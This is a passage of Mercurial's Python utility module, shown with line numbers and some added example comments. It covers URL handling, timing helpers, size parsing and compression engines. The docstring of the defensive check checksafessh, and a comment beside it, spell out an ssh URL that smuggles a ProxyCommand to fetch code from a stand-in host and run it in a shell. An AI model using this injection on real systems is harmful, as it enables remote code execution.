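# Hedged example (hypothetical values, not a doctest): for
# url(b'http://joe:xyzzy@example.com/repo').authinfo(), the first element is
# the URL with credentials stripped, 'http://example.com/repo', and the second
# is (None, ('http://example.com/repo', 'example.com'), 'joe', 'xyzzy').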
3331 3331
3332 3332 def isabs(self):
3333 3333 if self.scheme and self.scheme != 'file':
3334 3334 return True # remote URL
3335 3335 if hasdriveletter(self.path):
3336 3336 return True # absolute for our purposes - can't be joined()
3337 3337 if self.path.startswith(br'\\'):
3338 3338 return True # Windows UNC path
3339 3339 if self.path.startswith('/'):
3340 3340 return True # POSIX-style
3341 3341 return False
3342 3342
3343 3343 def localpath(self):
3344 3344 if self.scheme == 'file' or self.scheme == 'bundle':
3345 3345 path = self.path or '/'
3346 3346 # For Windows, we need to promote hosts containing drive
3347 3347 # letters to paths with drive letters.
3348 3348 if hasdriveletter(self._hostport):
3349 3349 path = self._hostport + '/' + self.path
3350 3350 elif (self.host is not None and self.path
3351 3351 and not hasdriveletter(path)):
3352 3352 path = '/' + path
3353 3353 return path
3354 3354 return self._origpath
3355 3355
3356 3356 def islocal(self):
3357 3357 '''whether localpath will return something that posixfile can open'''
3358 3358 return (not self.scheme or self.scheme == 'file'
3359 3359 or self.scheme == 'bundle')
3360 3360
3361 3361 def hasscheme(path):
3362 3362 return bool(url(path).scheme)
3363 3363
3364 3364 def hasdriveletter(path):
3365 3365 return path and path[1:2] == ':' and path[0:1].isalpha()
3366 3366
3367 3367 def urllocalpath(path):
3368 3368 return url(path, parsequery=False, parsefragment=False).localpath()
3369 3369
3370 3370 def checksafessh(path):
3371 3371 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3372 3372
3373 3373 This is a sanity check for ssh urls. ssh will parse the first item as
3374 3374 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3375 3375 Let's prevent these potentially exploitable urls entirely and warn the
3376 3376 user.
3377 3377
3378 3378 Raises an error.Abort when the url is unsafe.
3379 3379 """
3380 3380 path = urlreq.unquote(path)
3381 3381 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3382 3382 raise error.Abort(_('potentially unsafe url: %r') %
3383 3383 (path,))
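
# A sketch of what this rejects (illustrative, not a doctest): both calls
# below should raise error.Abort, since after unquoting each url starts
# with 'ssh://-':
#   checksafessh(b'ssh://-oProxyCommand=curl${IFS}bad.server|sh/path')
#   checksafessh(b'ssh://%2DoProxyCommand=do-something/path')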
3384 3384
3385 3385 def hidepassword(u):
3386 3386 '''hide user credential in a url string'''
3387 3387 u = url(u)
3388 3388 if u.passwd:
3389 3389 u.passwd = '***'
3390 3390 return bytes(u)
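
# Expected behavior, as a hedged sketch rather than a doctest:
#   hidepassword(b'http://joe:secret@example.com/')
#   -> 'http://joe:***@example.com/'
# URLs without a password should pass through unchanged.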
3391 3391
3392 3392 def removeauth(u):
3393 3393 '''remove all authentication information from a url string'''
3394 3394 u = url(u)
3395 3395 u.user = u.passwd = None
3396 3396 return bytes(u)
3397 3397
3398 3398 timecount = unitcountfn(
3399 3399 (1, 1e3, _('%.0f s')),
3400 3400 (100, 1, _('%.1f s')),
3401 3401 (10, 1, _('%.2f s')),
3402 3402 (1, 1, _('%.3f s')),
3403 3403 (100, 0.001, _('%.1f ms')),
3404 3404 (10, 0.001, _('%.2f ms')),
3405 3405 (1, 0.001, _('%.3f ms')),
3406 3406 (100, 0.000001, _('%.1f us')),
3407 3407 (10, 0.000001, _('%.2f us')),
3408 3408 (1, 0.000001, _('%.3f us')),
3409 3409 (100, 0.000000001, _('%.1f ns')),
3410 3410 (10, 0.000000001, _('%.2f ns')),
3411 3411 (1, 0.000000001, _('%.3f ns')),
3412 3412 )
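
# Assuming unitcountfn picks the first row whose threshold (multiplier times
# divisor) is met, in table order, a call like timecount(0.0123) should
# render as '12.30 ms' and timecount(2.5) as '2.500 s'.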
3413 3413
3414 3414 _timenesting = [0]
3415 3415
3416 3416 def timed(func):
3417 3417 '''Report the execution time of a function call to stderr.
3418 3418
3419 3419 During development, use as a decorator when you need to measure
3420 3420 the cost of a function, e.g. as follows:
3421 3421
3422 3422 @util.timed
3423 3423 def foo(a, b, c):
3424 3424 pass
3425 3425 '''
3426 3426
3427 3427 def wrapper(*args, **kwargs):
3428 3428 start = timer()
3429 3429 indent = 2
3430 3430 _timenesting[0] += indent
3431 3431 try:
3432 3432 return func(*args, **kwargs)
3433 3433 finally:
3434 3434 elapsed = timer() - start
3435 3435 _timenesting[0] -= indent
3436 3436 stderr.write('%s%s: %s\n' %
3437 3437 (' ' * _timenesting[0], func.__name__,
3438 3438 timecount(elapsed)))
3439 3439 return wrapper
3440 3440
3441 3441 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3442 3442 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
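# Note: the order above matters - the multi-letter suffixes must be tried
# before the bare 'b' so that e.g. '2kb' matches 'kb' rather than 'b'.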
3443 3443
3444 3444 def sizetoint(s):
3445 3445 '''Convert a space specifier to a byte count.
3446 3446
3447 3447 >>> sizetoint(b'30')
3448 3448 30
3449 3449 >>> sizetoint(b'2.2kb')
3450 3450 2252
3451 3451 >>> sizetoint(b'6M')
3452 3452 6291456
3453 3453 '''
3454 3454 t = s.strip().lower()
3455 3455 try:
3456 3456 for k, u in _sizeunits:
3457 3457 if t.endswith(k):
3458 3458 return int(float(t[:-len(k)]) * u)
3459 3459 return int(t)
3460 3460 except ValueError:
3461 3461 raise error.ParseError(_("couldn't parse size: %s") % s)
3462 3462
3463 3463 class hooks(object):
3464 3464 '''A collection of hook functions that can be used to extend a
3465 3465 function's behavior. Hooks are called in lexicographic order,
3466 3466 based on the names of their sources.'''
3467 3467
3468 3468 def __init__(self):
3469 3469 self._hooks = []
3470 3470
3471 3471 def add(self, source, hook):
3472 3472 self._hooks.append((source, hook))
3473 3473
3474 3474 def __call__(self, *args):
3475 3475 self._hooks.sort(key=lambda x: x[0])
3476 3476 results = []
3477 3477 for source, hook in self._hooks:
3478 3478 results.append(hook(*args))
3479 3479 return results
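
# A minimal usage sketch (the source names are made up): hooks fire in
# lexicographic order of their source names, regardless of add() order.
#   h = hooks()
#   h.add('zz-ext', lambda x: x + 2)
#   h.add('aa-ext', lambda x: x + 1)
#   h(10)  # -> [11, 12]; 'aa-ext' runs first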
3480 3480
3481 3481 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3482 3482 '''Yields lines for a nicely formatted stacktrace.
3483 3483 Skips the 'skip' last entries, then returns the last 'depth' entries.
3484 3484 Each file+linenumber is formatted according to fileline.
3485 3485 Each line is formatted according to line.
3486 3486 If line is None, it yields:
3487 3487 length of longest filepath+line number,
3488 3488 filepath+linenumber,
3489 3489 function
3490 3490
3491 3491 Not to be used in production code but very convenient while developing.
3492 3492 '''
3493 3493 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3494 3494 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3495 3495 ][-depth:]
3496 3496 if entries:
3497 3497 fnmax = max(len(entry[0]) for entry in entries)
3498 3498 for fnln, func in entries:
3499 3499 if line is None:
3500 3500 yield (fnmax, fnln, func)
3501 3501 else:
3502 3502 yield line % (fnmax, fnln, func)
3503 3503
3504 3504 def debugstacktrace(msg='stacktrace', skip=0,
3505 3505 f=stderr, otherf=stdout, depth=0):
3506 3506 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3507 3507 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3508 3508 By default it will flush stdout first.
3509 3509 It can be used everywhere and intentionally does not require an ui object.
3510 3510 Not to be used in production code but very convenient while developing.
3511 3511 '''
3512 3512 if otherf:
3513 3513 otherf.flush()
3514 3514 f.write('%s at:\n' % msg.rstrip())
3515 3515 for line in getstackframes(skip + 1, depth=depth):
3516 3516 f.write(line)
3517 3517 f.flush()
3518 3518
3519 3519 class dirs(object):
3520 3520 '''a multiset of directory names from a dirstate or manifest'''
3521 3521
3522 3522 def __init__(self, map, skip=None):
3523 3523 self._dirs = {}
3524 3524 addpath = self.addpath
3525 3525 if safehasattr(map, 'iteritems') and skip is not None:
3526 3526 for f, s in map.iteritems():
3527 3527 if s[0] != skip:
3528 3528 addpath(f)
3529 3529 else:
3530 3530 for f in map:
3531 3531 addpath(f)
3532 3532
3533 3533 def addpath(self, path):
3534 3534 dirs = self._dirs
3535 3535 for base in finddirs(path):
3536 3536 if base in dirs:
3537 3537 dirs[base] += 1
3538 3538 return
3539 3539 dirs[base] = 1
3540 3540
3541 3541 def delpath(self, path):
3542 3542 dirs = self._dirs
3543 3543 for base in finddirs(path):
3544 3544 if dirs[base] > 1:
3545 3545 dirs[base] -= 1
3546 3546 return
3547 3547 del dirs[base]
3548 3548
3549 3549 def __iter__(self):
3550 3550 return iter(self._dirs)
3551 3551
3552 3552 def __contains__(self, d):
3553 3553 return d in self._dirs
3554 3554
3555 3555 if safehasattr(parsers, 'dirs'):
3556 3556 dirs = parsers.dirs
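
# Usage sketch with hypothetical paths (the pure Python and C implementations
# should behave alike): each directory is kept alive while any tracked file
# remains beneath it.
#   d = dirs([b'a/b/f1', b'a/b/f2'])
#   b'a' in d and b'a/b' in d   # True
#   d.delpath(b'a/b/f1')
#   b'a/b' in d                 # still True, one file remains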
3557 3557
3558 3558 def finddirs(path):
3559 3559 pos = path.rfind('/')
3560 3560 while pos != -1:
3561 3561 yield path[:pos]
3562 3562 pos = path.rfind('/', 0, pos)
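
# E.g. list(finddirs(b'a/b/c')) should yield [b'a/b', b'a']: ancestors from
# deepest to shallowest, excluding the path itself and the empty root.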
3563 3563
3564 3564 # compression code
3565 3565
3566 3566 SERVERROLE = 'server'
3567 3567 CLIENTROLE = 'client'
3568 3568
3569 3569 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3570 3570 (u'name', u'serverpriority',
3571 3571 u'clientpriority'))
3572 3572
3573 3573 class compressormanager(object):
3574 3574 """Holds registrations of various compression engines.
3575 3575
3576 3576 This class essentially abstracts the differences between compression
3577 3577 engines to allow new compression formats to be added easily, possibly from
3578 3578 extensions.
3579 3579
3580 3580 Compressors are registered against the global instance by calling its
3581 3581 ``register()`` method.
3582 3582 """
3583 3583 def __init__(self):
3584 3584 self._engines = {}
3585 3585 # Bundle spec human name to engine name.
3586 3586 self._bundlenames = {}
3587 3587 # Internal bundle identifier to engine name.
3588 3588 self._bundletypes = {}
3589 3589 # Revlog header to engine name.
3590 3590 self._revlogheaders = {}
3591 3591 # Wire proto identifier to engine name.
3592 3592 self._wiretypes = {}
3593 3593
3594 3594 def __getitem__(self, key):
3595 3595 return self._engines[key]
3596 3596
3597 3597 def __contains__(self, key):
3598 3598 return key in self._engines
3599 3599
3600 3600 def __iter__(self):
3601 3601 return iter(self._engines.keys())
3602 3602
3603 3603 def register(self, engine):
3604 3604 """Register a compression engine with the manager.
3605 3605
3606 3606 The argument must be a ``compressionengine`` instance.
3607 3607 """
3608 3608 if not isinstance(engine, compressionengine):
3609 3609 raise ValueError(_('argument must be a compressionengine'))
3610 3610
3611 3611 name = engine.name()
3612 3612
3613 3613 if name in self._engines:
3614 3614 raise error.Abort(_('compression engine %s already registered') %
3615 3615 name)
3616 3616
3617 3617 bundleinfo = engine.bundletype()
3618 3618 if bundleinfo:
3619 3619 bundlename, bundletype = bundleinfo
3620 3620
3621 3621 if bundlename in self._bundlenames:
3622 3622 raise error.Abort(_('bundle name %s already registered') %
3623 3623 bundlename)
3624 3624 if bundletype in self._bundletypes:
3625 3625 raise error.Abort(_('bundle type %s already registered by %s') %
3626 3626 (bundletype, self._bundletypes[bundletype]))
3627 3627
3628 3628 # Only register the external facing name if the engine declared one.
3629 3629 if bundlename:
3630 3630 self._bundlenames[bundlename] = name
3631 3631
3632 3632 self._bundletypes[bundletype] = name
3633 3633
3634 3634 wiresupport = engine.wireprotosupport()
3635 3635 if wiresupport:
3636 3636 wiretype = wiresupport.name
3637 3637 if wiretype in self._wiretypes:
3638 3638 raise error.Abort(_('wire protocol compression %s already '
3639 3639 'registered by %s') %
3640 3640 (wiretype, self._wiretypes[wiretype]))
3641 3641
3642 3642 self._wiretypes[wiretype] = name
3643 3643
3644 3644 revlogheader = engine.revlogheader()
3645 3645 if revlogheader and revlogheader in self._revlogheaders:
3646 3646 raise error.Abort(_('revlog header %s already registered by %s') %
3647 3647 (revlogheader, self._revlogheaders[revlogheader]))
3648 3648
3649 3649 if revlogheader:
3650 3650 self._revlogheaders[revlogheader] = name
3651 3651
3652 3652 self._engines[name] = engine
3653 3653
3654 3654 @property
3655 3655 def supportedbundlenames(self):
3656 3656 return set(self._bundlenames.keys())
3657 3657
3658 3658 @property
3659 3659 def supportedbundletypes(self):
3660 3660 return set(self._bundletypes.keys())
3661 3661
3662 3662 def forbundlename(self, bundlename):
3663 3663 """Obtain a compression engine registered to a bundle name.
3664 3664
3665 3665 Will raise KeyError if the bundle type isn't registered.
3666 3666
3667 3667 Will abort if the engine is known but not available.
3668 3668 """
3669 3669 engine = self._engines[self._bundlenames[bundlename]]
3670 3670 if not engine.available():
3671 3671 raise error.Abort(_('compression engine %s could not be loaded') %
3672 3672 engine.name())
3673 3673 return engine
3674 3674
3675 3675 def forbundletype(self, bundletype):
3676 3676 """Obtain a compression engine registered to a bundle type.
3677 3677
3678 3678 Will raise KeyError if the bundle type isn't registered.
3679 3679
3680 3680 Will abort if the engine is known but not available.
3681 3681 """
3682 3682 engine = self._engines[self._bundletypes[bundletype]]
3683 3683 if not engine.available():
3684 3684 raise error.Abort(_('compression engine %s could not be loaded') %
3685 3685 engine.name())
3686 3686 return engine
3687 3687
3688 3688 def supportedwireengines(self, role, onlyavailable=True):
3689 3689 """Obtain compression engines that support the wire protocol.
3690 3690
3691 3691 Returns a list of engines in prioritized order, most desired first.
3692 3692
3693 3693 If ``onlyavailable`` is set, filter out engines that can't be
3694 3694 loaded.
3695 3695 """
3696 3696 assert role in (SERVERROLE, CLIENTROLE)
3697 3697
3698 3698 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3699 3699
3700 3700 engines = [self._engines[e] for e in self._wiretypes.values()]
3701 3701 if onlyavailable:
3702 3702 engines = [e for e in engines if e.available()]
3703 3703
3704 3704 def getkey(e):
3705 3705 # Sort first by priority, highest first. In case of tie, sort
3706 3706 # alphabetically. This is arbitrary, but ensures output is
3707 3707 # stable.
3708 3708 w = e.wireprotosupport()
3709 3709 return -1 * getattr(w, attr), w.name
3710 3710
3711 3711 return list(sorted(engines, key=getkey))
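
# With the engines registered below (zstd 50/50, zlib 20/20, bzip2 0/0,
# none 0/10), a hedged reading of the sort key gives, for the server role:
# [zstd, zlib, bzip2, none], with the tie at priority 0 broken alphabetically.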
3712 3712
3713 3713 def forwiretype(self, wiretype):
3714 3714 engine = self._engines[self._wiretypes[wiretype]]
3715 3715 if not engine.available():
3716 3716 raise error.Abort(_('compression engine %s could not be loaded') %
3717 3717 engine.name())
3718 3718 return engine
3719 3719
3720 3720 def forrevlogheader(self, header):
3721 3721 """Obtain a compression engine registered to a revlog header.
3722 3722
3723 3723 Will raise KeyError if the revlog header value isn't registered.
3724 3724 """
3725 3725 return self._engines[self._revlogheaders[header]]
3726 3726
3727 3727 compengines = compressormanager()
3728 3728
3729 3729 class compressionengine(object):
3730 3730 """Base class for compression engines.
3731 3731
3732 3732 Compression engines must implement the interface defined by this class.
3733 3733 """
3734 3734 def name(self):
3735 3735 """Returns the name of the compression engine.
3736 3736
3737 3737 This is the key the engine is registered under.
3738 3738
3739 3739 This method must be implemented.
3740 3740 """
3741 3741 raise NotImplementedError()
3742 3742
3743 3743 def available(self):
3744 3744 """Whether the compression engine is available.
3745 3745
3746 3746 The intent of this method is to allow optional compression engines
3747 3747 that may not be available in all installations (such as engines relying
3748 3748 on C extensions that may not be present).
3749 3749 """
3750 3750 return True
3751 3751
3752 3752 def bundletype(self):
3753 3753 """Describes bundle identifiers for this engine.
3754 3754
3755 3755 If this compression engine isn't supported for bundles, returns None.
3756 3756
3757 3757 If this engine can be used for bundles, returns a 2-tuple of strings of
3758 3758 the user-facing "bundle spec" compression name and an internal
3759 3759 identifier used to denote the compression format within bundles. To
3760 3760 exclude the name from external usage, set the first element to ``None``.
3761 3761
3762 3762 If bundle compression is supported, the class must also implement
3763 3763 ``compressstream`` and ``decompressorreader``.
3764 3764
3765 3765 The docstring of this method is used in the help system to tell users
3766 3766 about this engine.
3767 3767 """
3768 3768 return None
3769 3769
3770 3770 def wireprotosupport(self):
3771 3771 """Declare support for this compression format on the wire protocol.
3772 3772
3773 3773 If this compression engine isn't supported for compressing wire
3774 3774 protocol payloads, returns None.
3775 3775
3776 3776 Otherwise, returns ``compenginewireprotosupport`` with the following
3777 3777 fields:
3778 3778
3779 3779 * String format identifier
3780 3780 * Integer priority for the server
3781 3781 * Integer priority for the client
3782 3782
3783 3783 The integer priorities are used to order the advertisement of format
3784 3784 support by server and client. The highest integer is advertised
3785 3785 first. Integers with non-positive values aren't advertised.
3786 3786
3787 3787 The priority values are somewhat arbitrary and only used for default
3788 3788 ordering. The relative order can be changed via config options.
3789 3789
3790 3790 If wire protocol compression is supported, the class must also implement
3791 3791 ``compressstream`` and ``decompressorreader``.
3792 3792 """
3793 3793 return None
3794 3794
3795 3795 def revlogheader(self):
3796 3796 """Header added to revlog chunks that identifies this engine.
3797 3797
3798 3798 If this engine can be used to compress revlogs, this method should
3799 3799 return the bytes used to identify chunks compressed with this engine.
3800 3800 Else, the method should return ``None`` to indicate it does not
3801 3801 participate in revlog compression.
3802 3802 """
3803 3803 return None
3804 3804
3805 3805 def compressstream(self, it, opts=None):
3806 3806 """Compress an iterator of chunks.
3807 3807
3808 3808 The method receives an iterator (ideally a generator) of chunks of
3809 3809 bytes to be compressed. It returns an iterator (ideally a generator)
3810 3810 of chunks of bytes representing the compressed output.
3811 3811
3812 3812 Optionally accepts an argument defining how to perform compression.
3813 3813 Each engine treats this argument differently.
3814 3814 """
3815 3815 raise NotImplementedError()
3816 3816
3817 3817 def decompressorreader(self, fh):
3818 3818 """Perform decompression on a file object.
3819 3819
3820 3820 Argument is an object with a ``read(size)`` method that returns
3821 3821 compressed data. Return value is an object with a ``read(size)`` that
3822 3822 returns uncompressed data.
3823 3823 """
3824 3824 raise NotImplementedError()
3825 3825
3826 3826 def revlogcompressor(self, opts=None):
3827 3827 """Obtain an object that can be used to compress revlog entries.
3828 3828
3829 3829 The object has a ``compress(data)`` method that compresses binary
3830 3830 data. This method returns compressed binary data or ``None`` if
3831 3831 the data could not be compressed (too small, not compressible, etc).
3832 3832 The returned data should have a header uniquely identifying this
3833 3833 compression format so decompression can be routed to this engine.
3834 3834 This header should be identified by the ``revlogheader()`` return
3835 3835 value.
3836 3836
3837 3837 The object has a ``decompress(data)`` method that decompresses
3838 3838 data. The method will only be called if ``data`` begins with
3839 3839 ``revlogheader()``. The method should return the raw, uncompressed
3840 3840 data or raise a ``RevlogError``.
3841 3841
3842 3842 The object is reusable but is not thread safe.
3843 3843 """
3844 3844 raise NotImplementedError()
3845 3845
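# A hedged sketch of a hypothetical engine built on this interface (identity
# "compression" with bundle support only; the names and 'ID' identifier are
# made up for illustration and intentionally left commented out):
#
#   class _identityengine(compressionengine):
#       def name(self):
#           return 'identity'
#       def bundletype(self):
#           """No-op engine, for illustration only."""
#           return 'identity', 'ID'
#       def compressstream(self, it, opts=None):
#           return it
#       def decompressorreader(self, fh):
#           return fh
#
#   compengines.register(_identityengine())
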
3846 3846 class _zlibengine(compressionengine):
3847 3847 def name(self):
3848 3848 return 'zlib'
3849 3849
3850 3850 def bundletype(self):
3851 3851 """zlib compression using the DEFLATE algorithm.
3852 3852
3853 3853 All Mercurial clients should support this format. The compression
3854 3854 algorithm strikes a reasonable balance between compression ratio
3855 3855 and size.
3856 3856 """
3857 3857 return 'gzip', 'GZ'
3858 3858
3859 3859 def wireprotosupport(self):
3860 3860 return compewireprotosupport('zlib', 20, 20)
3861 3861
3862 3862 def revlogheader(self):
3863 3863 return 'x'
3864 3864
3865 3865 def compressstream(self, it, opts=None):
3866 3866 opts = opts or {}
3867 3867
3868 3868 z = zlib.compressobj(opts.get('level', -1))
3869 3869 for chunk in it:
3870 3870 data = z.compress(chunk)
3871 3871 # Not all calls to compress emit data. It is cheaper to inspect
3872 3872 # here than to feed empty chunks through the generator.
3873 3873 if data:
3874 3874 yield data
3875 3875
3876 3876 yield z.flush()
3877 3877
3878 3878 def decompressorreader(self, fh):
3879 3879 def gen():
3880 3880 d = zlib.decompressobj()
3881 3881 for chunk in filechunkiter(fh):
3882 3882 while chunk:
3883 3883 # Limit output size to limit memory.
3884 3884 yield d.decompress(chunk, 2 ** 18)
3885 3885 chunk = d.unconsumed_tail
3886 3886
3887 3887 return chunkbuffer(gen())
3888 3888
3889 3889 class zlibrevlogcompressor(object):
3890 3890 def compress(self, data):
3891 3891 insize = len(data)
3892 3892 # Caller handles empty input case.
3893 3893 assert insize > 0
3894 3894
3895 3895 if insize < 44:
3896 3896 return None
3897 3897
3898 3898 elif insize <= 1000000:
3899 3899 compressed = zlib.compress(data)
3900 3900 if len(compressed) < insize:
3901 3901 return compressed
3902 3902 return None
3903 3903
3904 3904 # zlib makes an internal copy of the input buffer, doubling
3905 3905 # memory usage for large inputs. So do streaming compression
3906 3906 # on large inputs.
3907 3907 else:
3908 3908 z = zlib.compressobj()
3909 3909 parts = []
3910 3910 pos = 0
3911 3911 while pos < insize:
3912 3912 pos2 = pos + 2**20
3913 3913 parts.append(z.compress(data[pos:pos2]))
3914 3914 pos = pos2
3915 3915 parts.append(z.flush())
3916 3916
3917 3917 if sum(map(len, parts)) < insize:
3918 3918 return ''.join(parts)
3919 3919 return None
3920 3920
3921 3921 def decompress(self, data):
3922 3922 try:
3923 3923 return zlib.decompress(data)
3924 3924 except zlib.error as e:
3925 3925 raise error.RevlogError(_('revlog decompress error: %s') %
3926 3926 forcebytestr(e))
3927 3927
3928 3928 def revlogcompressor(self, opts=None):
3929 3929 return self.zlibrevlogcompressor()
3930 3930
3931 3931 compengines.register(_zlibengine())
3932 3932
3933 3933 class _bz2engine(compressionengine):
3934 3934 def name(self):
3935 3935 return 'bz2'
3936 3936
3937 3937 def bundletype(self):
3938 3938 """An algorithm that produces smaller bundles than ``gzip``.
3939 3939
3940 3940 All Mercurial clients should support this format.
3941 3941
3942 3942 This engine will likely produce smaller bundles than ``gzip`` but
3943 3943 will be significantly slower, both during compression and
3944 3944 decompression.
3945 3945
3946 3946 If available, the ``zstd`` engine can yield similar or better
3947 3947 compression at much higher speeds.
3948 3948 """
3949 3949 return 'bzip2', 'BZ'
3950 3950
3951 3951 # We declare a protocol name but don't advertise by default because
3952 3952 # it is slow.
3953 3953 def wireprotosupport(self):
3954 3954 return compewireprotosupport('bzip2', 0, 0)
3955 3955
3956 3956 def compressstream(self, it, opts=None):
3957 3957 opts = opts or {}
3958 3958 z = bz2.BZ2Compressor(opts.get('level', 9))
3959 3959 for chunk in it:
3960 3960 data = z.compress(chunk)
3961 3961 if data:
3962 3962 yield data
3963 3963
3964 3964 yield z.flush()
3965 3965
3966 3966 def decompressorreader(self, fh):
3967 3967 def gen():
3968 3968 d = bz2.BZ2Decompressor()
3969 3969 for chunk in filechunkiter(fh):
3970 3970 yield d.decompress(chunk)
3971 3971
3972 3972 return chunkbuffer(gen())
3973 3973
3974 3974 compengines.register(_bz2engine())
3975 3975
3976 3976 class _truncatedbz2engine(compressionengine):
3977 3977 def name(self):
3978 3978 return 'bz2truncated'
3979 3979
3980 3980 def bundletype(self):
3981 3981 return None, '_truncatedBZ'
3982 3982
3983 3983 # We don't implement compressstream because it is hackily handled elsewhere.
3984 3984
3985 3985 def decompressorreader(self, fh):
3986 3986 def gen():
3987 3987 # The input stream doesn't have the 'BZ' header. So add it back.
3988 3988 d = bz2.BZ2Decompressor()
3989 3989 d.decompress('BZ')
3990 3990 for chunk in filechunkiter(fh):
3991 3991 yield d.decompress(chunk)
3992 3992
3993 3993 return chunkbuffer(gen())
3994 3994
3995 3995 compengines.register(_truncatedbz2engine())
3996 3996
3997 3997 class _noopengine(compressionengine):
3998 3998 def name(self):
3999 3999 return 'none'
4000 4000
4001 4001 def bundletype(self):
4002 4002 """No compression is performed.
4003 4003
4004 4004 Use this compression engine to explicitly disable compression.
4005 4005 """
4006 4006 return 'none', 'UN'
4007 4007
4008 4008 # Clients always support uncompressed payloads. Servers don't because,
4009 4009 # unless you are on a fast network, uncompressed payloads can easily
4010 4010 # saturate your network pipe.
4011 4011 def wireprotosupport(self):
4012 4012 return compewireprotosupport('none', 0, 10)
4013 4013
4014 4014 # We don't implement revlogheader because it is handled specially
4015 4015 # in the revlog class.
4016 4016
4017 4017 def compressstream(self, it, opts=None):
4018 4018 return it
4019 4019
4020 4020 def decompressorreader(self, fh):
4021 4021 return fh
4022 4022
4023 4023 class nooprevlogcompressor(object):
4024 4024 def compress(self, data):
4025 4025 return None
4026 4026
4027 4027 def revlogcompressor(self, opts=None):
4028 4028 return self.nooprevlogcompressor()
4029 4029
4030 4030 compengines.register(_noopengine())
4031 4031
4032 4032 class _zstdengine(compressionengine):
4033 4033 def name(self):
4034 4034 return 'zstd'
4035 4035
4036 4036 @propertycache
4037 4037 def _module(self):
4038 4038 # Not all installs have the zstd module available. So defer importing
4039 4039 # until first access.
4040 4040 try:
4041 4041 from . import zstd
4042 4042 # Force delayed import.
4043 4043 zstd.__version__
4044 4044 return zstd
4045 4045 except ImportError:
4046 4046 return None
4047 4047
4048 4048 def available(self):
4049 4049 return bool(self._module)
4050 4050
4051 4051 def bundletype(self):
4052 4052 """A modern compression algorithm that is fast and highly flexible.
4053 4053
4054 4054 Only supported by Mercurial 4.1 and newer clients.
4055 4055
4056 4056 With the default settings, zstd compression is both faster and yields
4057 4057 better compression than ``gzip``. It also frequently yields better
4058 4058 compression than ``bzip2`` while operating at much higher speeds.
4059 4059
4060 4060 If this engine is available and backwards compatibility is not a
4061 4061 concern, it is likely the best available engine.
4062 4062 """
4063 4063 return 'zstd', 'ZS'
4064 4064
4065 4065 def wireprotosupport(self):
4066 4066 return compewireprotosupport('zstd', 50, 50)
4067 4067
4068 4068 def revlogheader(self):
4069 4069 return '\x28'
4070 4070
4071 4071 def compressstream(self, it, opts=None):
4072 4072 opts = opts or {}
4073 4073 # zstd level 3 is almost always significantly faster than zlib
4074 4074 # while providing no worse compression. It strikes a good balance
4075 4075 # between speed and compression.
4076 4076 level = opts.get('level', 3)
4077 4077
4078 4078 zstd = self._module
4079 4079 z = zstd.ZstdCompressor(level=level).compressobj()
4080 4080 for chunk in it:
4081 4081 data = z.compress(chunk)
4082 4082 if data:
4083 4083 yield data
4084 4084
4085 4085 yield z.flush()
4086 4086
4087 4087 def decompressorreader(self, fh):
4088 4088 zstd = self._module
4089 4089 dctx = zstd.ZstdDecompressor()
4090 4090 return chunkbuffer(dctx.read_from(fh))
4091 4091
4092 4092 class zstdrevlogcompressor(object):
4093 4093 def __init__(self, zstd, level=3):
4094 4094 # Writing the content size adds a few bytes to the output. However,
4095 4095 # it allows decompression to be more optimal since we can
4096 4096 # pre-allocate a buffer to hold the result.
4097 4097 self._cctx = zstd.ZstdCompressor(level=level,
4098 4098 write_content_size=True)
4099 4099 self._dctx = zstd.ZstdDecompressor()
4100 4100 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
4101 4101 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
4102 4102
4103 4103 def compress(self, data):
4104 4104 insize = len(data)
4105 4105 # Caller handles empty input case.
4106 4106 assert insize > 0
4107 4107
4108 4108 if insize < 50:
4109 4109 return None
4110 4110
4111 4111 elif insize <= 1000000:
4112 4112 compressed = self._cctx.compress(data)
4113 4113 if len(compressed) < insize:
4114 4114 return compressed
4115 4115 return None
4116 4116 else:
4117 4117 z = self._cctx.compressobj()
4118 4118 chunks = []
4119 4119 pos = 0
4120 4120 while pos < insize:
4121 4121 pos2 = pos + self._compinsize
4122 4122 chunk = z.compress(data[pos:pos2])
4123 4123 if chunk:
4124 4124 chunks.append(chunk)
4125 4125 pos = pos2
4126 4126 chunks.append(z.flush())
4127 4127
4128 4128 if sum(map(len, chunks)) < insize:
4129 4129 return ''.join(chunks)
4130 4130 return None
4131 4131
4132 4132 def decompress(self, data):
4133 4133 insize = len(data)
4134 4134
4135 4135 try:
4136 4136 # This was measured to be faster than other streaming
4137 4137 # decompressors.
4138 4138 dobj = self._dctx.decompressobj()
4139 4139 chunks = []
4140 4140 pos = 0
4141 4141 while pos < insize:
4142 4142 pos2 = pos + self._decompinsize
4143 4143 chunk = dobj.decompress(data[pos:pos2])
4144 4144 if chunk:
4145 4145 chunks.append(chunk)
4146 4146 pos = pos2
4147 4147 # Frame should be exhausted, so no finish() API.
4148 4148
4149 4149 return ''.join(chunks)
4150 4150 except Exception as e:
4151 4151 raise error.RevlogError(_('revlog decompress error: %s') %
4152 4152 forcebytestr(e))
4153 4153
4154 4154 def revlogcompressor(self, opts=None):
4155 4155 opts = opts or {}
4156 4156 return self.zstdrevlogcompressor(self._module,
4157 4157 level=opts.get('level', 3))
4158 4158
4159 4159 compengines.register(_zstdengine())
4160 4160
4161 4161 def bundlecompressiontopics():
4162 4162 """Obtains a list of available bundle compressions for use in help."""
4163 4163 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
4164 4164 items = {}
4165 4165
4166 4166 # We need to format the docstring. So use a dummy object/type to hold it
4167 4167 # rather than mutating the original.
4168 4168 class docobject(object):
4169 4169 pass
4170 4170
4171 4171 for name in compengines:
4172 4172 engine = compengines[name]
4173 4173
4174 4174 if not engine.available():
4175 4175 continue
4176 4176
4177 4177 bt = engine.bundletype()
4178 4178 if not bt or not bt[0]:
